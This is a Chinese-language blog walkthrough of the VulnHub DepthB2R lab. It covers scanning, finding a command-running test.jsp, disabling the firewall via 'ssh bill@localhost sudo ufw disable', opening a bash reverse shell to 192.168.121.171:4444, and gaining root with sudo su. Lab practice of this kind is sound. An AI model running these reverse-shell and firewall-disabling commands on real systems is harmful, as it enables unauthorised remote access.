首页 > 其他分享 >DepthB2R靶场实战【超详细】

DepthB2R靶场实战【超详细】

时间:2024-08-05 19:25:15浏览次数:20  
标签:实战 shell la sudo 192.168 DepthB2R ls 靶场 bill

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

一、主机探测与端口扫描

nmap 192.168.121.0/24

 发现开启了8080端口

我们对该端口进行扫描

nmap 192.168.121.187 -p- -A -Pn -sV

 访问其8080web服务

二、get shell

目录扫描

dirsearch -u http://192.168.121.187:8080

 有一个test.jsp,我们访问它

 提示我们可以输入命令

输入ls -la /home,发现root 和bill用户

ls -la /home

我们尝试反弹shell

bash -i >& /dev/tcp/192.168.121.171/4444 0>&1

反弹未能成功,我们看一下进程

ps aux

 发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙

查看/etc下,防火墙是存在的

ls -la /etc

 

我们尝试关闭防火墙

ssh bill@localhost sudo ufw disable

再次尝试反弹

ssh bill@localhost bash -i >& /dev/tcp/192.168.121.171/4444 0>&1

kali开启监听,成功反弹shell

 三、提权

sudo -l

sudo -l查看具有sudo权限的命令程序

显示所有用户,直接sudo su

sudo su

成功提权

标签:实战,shell,la,sudo,192.168,DepthB2R,ls,靶场,bill
From: https://blog.csdn.net/weixin_68615160/article/details/140934358

相关文章

  • 基于人工智能的代码分析与 Bug 检测实战
    简介在人工智能还未盛行的时候,检测Bug通常是通过以下几种方式完成:研发编写单元测试。代码扫描工具,SonarQube、findbugs。测试人员进行集成测试。而现在其中的一部分工作,都可以通过人工智能提升效率,辅助开发与测试发现更多的问题,降低成本和提高软件质量。对应流程相......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • 创新舞台的幕后:一位项目负责人的实战经验与应对策略
    创新舞台的幕后:一位项目负责人的实战经验与应对策略前言技术故障:预防与应对时间管理:精确控制意外中断:保持冷静参与者问题:灵活应对技术故障与主题偏离:清晰传达评委反应:积极互动个人状况:自我调节结语前言  在创新的浪潮中,每一位项目负责人都是勇敢的航海家,驾驭着团队......
  • Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
    靶场界面点击查看exp↓↓↓"""vulnerabilitycoveredbyCVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requ......
  • AI绘画进阶 ComfyUI 实战教程:轻松给图片添加文字,附工作流教程使用
    大家好,我是设计师阿威在AI绘画中书写文字一直是个老大难的问题,直到SDXL的出现,文字生成才迎来转机,可以在提示词中指定一些英文字符,不过也是经常出错,生成中文就更加不可求了。本文介绍一种在图片中稳定生成文字的方法,可以自定义字体、颜色、大小,以及文字书写方向,有兴趣的同......
  • Django5+Vue3:OA系统前后端分离项目实战-异步优化Ajax请求(12)
    Django5+Vue3系列文章前言本节开始,全文仅对会员开放。若点赞和收藏数量超过100,全文将免费开放。此项目采用Django框架的5.0.7版本进行开发。Django5.0支持的Python版本为3.10、3.11和3.12。OA系统系列文章将持续更新,直至项目的Docker部署阶段。专栏链接:......
  • Django5+Vue3:OA系统前后端分离项目实战-Pinia用户和token信息管理(11)
    Django5+Vue3系列文章前言本节开始,全文仅对会员开放。若点赞和收藏数量超过100,全文将免费开放。此项目采用Django框架的5.0.7版本进行开发。Django5.0支持的Python版本为3.10、3.11和3.12。OA系统系列文章将持续更新,直至项目的Docker部署阶段。专栏链接:......
  • 【包邮送书】LaTeX 从入门到实战
    欢迎关注博主Mindtechnist或加入【智能科技社区】一起学习和分享Linux、C、C++、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关注公粽号《机器和智能》回复关键词“python项目实战......
  • “命令行利器:sort、uniq、date、ntpdate详解与实战“
    当今操作系统中的命令行工具不仅是管理和调试系统的利器,也是程序员和系统管理员的重要工具。在Unix和类Unix系统中,sort、uniq、date和ntpdate是几个常用的命令,它们各自拥有独特的功能,可以在日常工作中极大地提高效率。本文将深入探讨这些命令的用法和实际应用。1. sort命令s......
  • Mybatis实战:#{} 和 ${}的使用区别和数据库连接池
    一.#{}和${}#{}和${}在MyBatis框架中都是用于SQL语句中参数替换的标记,但它们在使用方式和处理参数值上存在一些显著的区别。#{}的作用:#{}是MyBatis中用于预编译SQL语句的参数占位符。它会将参数值放入一个预编译的PreparedStatement中,确保参数值被正确地转义和引用,从......